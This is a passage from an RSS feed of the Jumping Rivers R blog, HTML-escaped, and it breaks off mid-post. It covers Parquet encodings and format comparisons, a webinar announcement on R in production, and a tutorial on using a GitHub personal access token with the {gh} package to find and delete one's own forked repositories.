&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 2 × 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; size&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;fs::bytes&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 808&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 1.91M&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We see that the parquet file is tiny, whereas the CSV file is almost
2MB. This is actually a 500 fold reduction in file space.&lt;/p&gt;
&lt;h3 id="dictionary-encoding"&gt;Dictionary encoding&lt;/h3&gt;
&lt;p&gt;Suppose we had the following character vector&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Jumping Rivers&amp;#34; &amp;#34;Jumping Rivers&amp;#34; &amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we want to save storage, then we could replace &lt;code&gt;Jumping Rivers&lt;/code&gt; with
the number &lt;code&gt;0&lt;/code&gt; and have a table to map between &lt;code&gt;0&lt;/code&gt; and &lt;code&gt;Jumping Rivers&lt;/code&gt;.
This would significantly reduce storage, especially for long vectors.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1e6&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;arrow&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_parquet&lt;/span&gt;(x, sink &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; parquet)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_csv&lt;/span&gt;(x, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; csv)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fs&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;file_info&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(parquet, csv))[, &lt;span style="color:#a5d6ff"&gt;&amp;#34;size&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 2 × 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; size&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;fs::bytes&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 909&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 14.3M&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="delta-encoding"&gt;Delta encoding&lt;/h3&gt;
&lt;p&gt;This encoding is typically used in conjunction with timestamps. Times
are typically stored as Unix times, which is the &lt;a href="https://www.epochconverter.com/" rel="external"&gt;number of
seconds&lt;/a&gt; that have elapsed since
January 1st, 1970. This storage format isn’t particularly helpful for
humans, so typically it is pretty-printed to make it more palatable for
us. For example,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.time&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;2024-02-01 13:02:03 CET&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unclass&lt;/span&gt;(time)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 1706788923&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we have a large number of time stamps in a column, one method for
reducing file size is to simply subtract the minimum time stamp from all
values. For example, instead of storing&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1628426074&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1628426078&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1628426080&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 1628426074 1628426078 1628426080&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;we would store&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 0 4 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;with the corresponding offset &lt;code&gt;1628426074&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="other-encodings"&gt;Other encodings&lt;/h3&gt;
&lt;p&gt;There are a few other tricks that parquet uses. Their &lt;a href="https://github.com/apache/parquet-format/blob/master/Encodings.md" rel="external"&gt;GitHub
page&lt;/a&gt;
gives a complete overview.&lt;/p&gt;
&lt;p&gt;If you have a parquet file, you can use
&lt;a href="https://github.com/apache/parquet-mr" rel="external"&gt;parquet-mr&lt;/a&gt; to investigate the
encoding used within a file. However, installing the tool isn’t trivial
and does take some time.&lt;/p&gt;
&lt;h2 id="feather-vs-parquet"&gt;Feather vs Parquet&lt;/h2&gt;
&lt;p&gt;The obvious question that comes to mind when discussing parquet, is how
does it compare to the feather format. Feather is optimised for speed,
whereas parquet is optimised for storage. It’s also worth noting, that
the &lt;a href="https://arrow.apache.org/faq/#what-about-the-feather-file-format" rel="external"&gt;Apache
Arrow&lt;/a&gt;
file format &lt;em&gt;is&lt;/em&gt; feather.&lt;/p&gt;
&lt;h2 id="parquet-vs-rds-formats"&gt;Parquet vs RDS Formats&lt;/h2&gt;
&lt;p&gt;The RDS file format used by &lt;code&gt;readRDS()/saveRDS()&lt;/code&gt; and &lt;code&gt;load()/save()&lt;/code&gt;.
It is file format native to R and can only be read by R. The main
benefit of using RDS is that it can store any R object - environments,
lists, and functions.&lt;/p&gt;
&lt;p&gt;If we are solely interested in rectangular data structures, e.g. data
frames, then reasons for using RDS files are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the file format has been around for a long time and isn’t likely to
change. This means it is backwards compatible&lt;/li&gt;
&lt;li&gt;it doesn’t depend on any external packages; just base R.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The advantages of using parquet are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the file size of parquet files are slightly smaller. If you want to
compare file sizes, make sure you set &lt;code&gt;compression = &amp;quot;gzip&amp;quot;&lt;/code&gt; in
&lt;code&gt;write_parquet()&lt;/code&gt; for a fair comparison.&lt;/li&gt;
&lt;li&gt;parquet files are cross platform&lt;/li&gt;
&lt;li&gt;in my experiments, parquet files, as you would expect, are slightly
smaller. For some use cases, an additional saving of 5% may be worth
it. But, as always, it depends on your particular use cases.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references"&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;a href="https://en.wikipedia.org/wiki/Snappy_%5C%28compression%5C%29" rel="external"&gt;default
compression&lt;/a&gt;
algorithm used by Parquet.&lt;/li&gt;
&lt;li&gt;A nice &lt;a href="https://www.youtube.com/watch?v=RwGGqwe-SAY" rel="external"&gt;talk&lt;/a&gt; by
Raoul-Gabriel Urma.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/ktrueda/parquet-tools" rel="external"&gt;Parquet-tools&lt;/a&gt; for
interrogating Parquet files.&lt;/li&gt;
&lt;li&gt;The official list of &lt;a href="https://github.com/apache/parquet-format/blob/master/Encodings.md" rel="external"&gt;file
optimisations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Stackoverflow questions on Parquet: &lt;a href="https://stackoverflow.com/questions/48083405/what-are-the-differences-between-feather-and-parquet" rel="external"&gt;Feather &amp;amp;
Parquet&lt;/a&gt;
and &lt;a href="https://stackoverflow.com/questions/56472727/difference-between-apache-parquet-and-arrow" rel="external"&gt;Arrow and
Parquet&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/parquet-file-format-big-data-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Webinars: Practical Advice for R in Production</title><link>https://www.jumpingrivers.com/blog/webinars-practical-advice-for-r-in-production/</link><pubDate>Mon, 19 Jul 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/webinars-practical-advice-for-r-in-production/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/webinars-practical-advice-for-r-in-production/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/rstudio-r-in-production-security-connect/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Many organisations have a robust infrastructure
that allows their data science teams to provide, fast and reliable insights.
But for many groups, they are just starting down this path.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-rstudio-r-in-production-security-connect"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;We, &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;, have partnered with &lt;a href="https://rstudio.com/" rel="external"&gt;RStudio&lt;/a&gt; to launch a two-part webinar series which examines and explores the usage of R in production environments.
The first webinar will discuss the big picture of using open source languages and tools in enterprise environments.
We&amp;rsquo;ll investigate typical set-ups which many companies employ when implementing R in production.
Borrowing from the idea of &lt;a href="https://www.youtube.com/watch?v=7oyiPBjLAWY" rel="external"&gt;Code Smell&lt;/a&gt;,
we&amp;rsquo;ll think about &amp;ldquo;R in Production&amp;rdquo;. That is, set-ups that seem OK at first glance,
but on closer inspection are lacking. We&amp;rsquo;ll end the first webinar, by discussing
successful set-ups companies have adopted.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Sign up for &lt;a href="https://www.rstudio.com/registration/practical-advice-for-r-in-production/" rel="external"&gt;part 1&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The second webinar will be a hands-on workshop to gain certain skills for securely putting R in production.
If you are interested, in saying how RStudio tools can make your data science life easier,
then this is the workshop for you.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Sign up for &lt;a href="https://www.rstudio.com/registration/practical-advice-for-r-in-production-2/" rel="external"&gt;part 2&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/webinars-practical-advice-for-r-in-production/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Cleaning up forked GitHub repositories with {gh}</title><link>https://www.jumpingrivers.com/blog/github-clean-remove-forks/</link><pubDate>Tue, 13 Jul 2021 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/github-clean-remove-forks/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/github-clean-remove-forks/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;One great thing about using &lt;a href="https://github.com/" rel="external"&gt;GitHub&lt;/a&gt; is the ability
to view and contribute to others’ code. Even the code underlying many of
our favourite packages is available for us to examine and play around
with.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://guides.github.com/activities/forking/" rel="external"&gt;Forking a repository&lt;/a&gt; is
a great way to create an exact replica of someone else’s project in our
own user space. We can then freely make changes to this copy without
affecting the original project. If you end up especially proud of your
changes, you can then submit a Pull Request to offer them up to the
owner of the original repository. However, your fork doesn’t have to end
up in a contribution - you can also just keep experimenting with the
code forever or use it as a starting point for your own project.&lt;/p&gt;
&lt;h3 id="a-forking-mess"&gt;A forking mess&lt;/h3&gt;
&lt;p&gt;If you are an avid forker of GitHub repos, your original repositories on
GitHub may quickly become crammed in between an endless stream of forked
repos. Your user space has become very cluttered, with old forks that
you haven’t looked at in years still taking up space. Well, now it’s
time for some spring cleaning and the first task is de-cluttering your
repositories by removing forks.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2021-github-clean-remove-forks"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="manually-cleaning"&gt;Manually cleaning&lt;/h3&gt;
&lt;p&gt;You can manually delete repositories using the GitHub interface. Go to
the repository you wish to delete, then select &lt;em&gt;Settings&lt;/em&gt; at the top of
the page&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/github-settings.png" title="The Settings button on your repository" alt="The Settings button on your repository" style="display: block; margin: auto;" /&gt;
&lt;p&gt;Then scroll to the bottom of the page and enter the &lt;em&gt;Danger Zone&lt;/em&gt; marked
by a red box.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/github-danger-zone.png" title="Deleting a repo from the Danger Zone" alt="Deleting a repo from the Danger Zone" style="display: block; margin: auto;" /&gt;
&lt;p&gt;From there, you can select &lt;em&gt;Delete this repository&lt;/em&gt; which will prompt
you to confirm that you are absolutely sure of what you’re doing by
typing out the name of the repository. Note that after deleting the
repository, the action &lt;em&gt;cannot&lt;/em&gt; be undone. Also note that if you are
deleting a forked repository, deleting it will only remove it (including
any changes you have made to it) from your own GitHub - you won’t
accidentally delete the original project (phew).&lt;/p&gt;
&lt;p&gt;So it is possible to clean up your GitHub manually and this might be the
most suitable way if you’re only wanting to delete 1-2 repositories. But
let’s say you’ve forked over fifty repositories. Manually going into
each one, finding the delete button in the settings and typing in the
confirmation prompt is not what you want to spend your day doing. As
with all manual methods, pointing and clicking does not scale
particularly well.&lt;/p&gt;
&lt;h2 id="using-the-gh-package"&gt;Using the {gh} package&lt;/h2&gt;
&lt;p&gt;The &lt;a href="https://cran.r-project.org/web/packages/gh/" rel="external"&gt;{gh}&lt;/a&gt; provides an
R-user-friendly wrapper around the GitHub API. It lets you interact with
GitHub to e.g. create new repositories or delete old ones directly from
RStudio. The package is on CRAN and is installed in the usual way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gh&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To use the package, you first need to generate a Personal Access Token
(PAT).&lt;/p&gt;
&lt;h3 id="getting-a-token"&gt;Getting a token&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.github.com/en/github/authenticating-to-github/keeping-your-account-and-data-secure/creating-a-personal-access-token" rel="external"&gt;Creating a personal access
token&lt;/a&gt;
to be able to use the GitHub API is easy. You can either navigate to the
page on GitHub (Settings &amp;gt; Developer Settings &amp;gt; Personal Access tokens
&amp;gt; Generate new token), or you can use the handy &lt;code&gt;create_github_token()&lt;/code&gt;
function from &lt;a href="https://github.com/r-lib/usethis" rel="external"&gt;{usethis}&lt;/a&gt; which will
open the same page in your browser.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_github_token&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/new-token.png" title="Adding a new Personal access token." alt="Adding a new Personal access token." style="display: block; margin: auto;" /&gt;
&lt;p&gt;From there, you give your token a useful name as well as select what
access should be granted by the token. Note: if you want to use {gh} to
delete unwanted forked repositories, you will need to select the
&lt;em&gt;delete_repo&lt;/em&gt; scope.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/token-delete-scope.png" title="Setting the delete_repo scope for your token." alt="Setting the delete_repo scope for your token." style="display: block; margin: auto;" /&gt;
&lt;p&gt;However, be aware that this allows you to delete any repo - not just
forked ones. After deciding on the scopes, you generate your token. As
the page tells you, you will have to store your token somewhere as you
won’t be able to access it again after closing the page. We recommend
copying it and storing it in a password manager such as LastPass. Once
you have saved your token somewhere secure, you can make it available to
your R environment using the &lt;code&gt;set_github_pat()&lt;/code&gt; function from the
&lt;a href="https://github.com/r-lib/credentials" rel="external"&gt;{credentials}&lt;/a&gt; package which will
prompt you to enter your PAT, which you did save somewhere… right? If
you did not follow our advice and now no longer have access to your PAT,
don’t worry, you can delete the old one on GitHub and generate a new
one.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/github-clean-remove-forks/view-existing-tokens.png" title="Viewing existing tokens" alt="Viewing existing tokens" style="display: block; margin: auto;" /&gt;
&lt;p&gt;OK, now that you’ve definitely got your token ready, you can run the
code below&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;credentials&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_github_pat&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which will prompt you to enter your PAT. Now you can finally get to the
cleaning!&lt;/p&gt;
&lt;h3 id="cleaning"&gt;Cleaning&lt;/h3&gt;
&lt;p&gt;We will load the {gh} package, as well as the {magrittr} package to get
access to pipes.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gh&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;magrittr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Step one is to retrieve your repositories&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_username &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;your_username_goes_here&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_repos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gh&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;GET /users/:owner/repos&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; owner &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; my_username,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; page &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; per_page &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The GitHub API is paginated. This means it returns results in pages,
with at most 100 results per page. If&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(my_repos)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;is less than 100, then you don’t need to worry. If you have more than
100 repositories, you can either choose a page or loop through all
pages.&lt;/p&gt;
&lt;p&gt;The object &lt;code&gt;my_repos&lt;/code&gt; is now a list of repositories. Each element of the
list is a particular repository. We are interested in two particular
elements: &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;fork&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_repos[[1]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_repos[[1]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;fork
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;These elements tell us the name of the repository and whether it was
created as a result of forking. Now we just repeat this process for all
of our repositories and filter to return only the repositories which are
forked.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;forked_repos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_dfr&lt;/span&gt;(my_repos, &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;(.x&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;fork&amp;#34;&lt;/span&gt;)])) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(fork &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;TRUE&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Here &amp;#34;TRUE&amp;#34; is a character, not a logical&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The next step involves manually, and very &lt;strong&gt;carefully&lt;/strong&gt; selecting the
repositories you want to delete. If you want to delete all forked
repositories (!), simply set&lt;/p&gt;
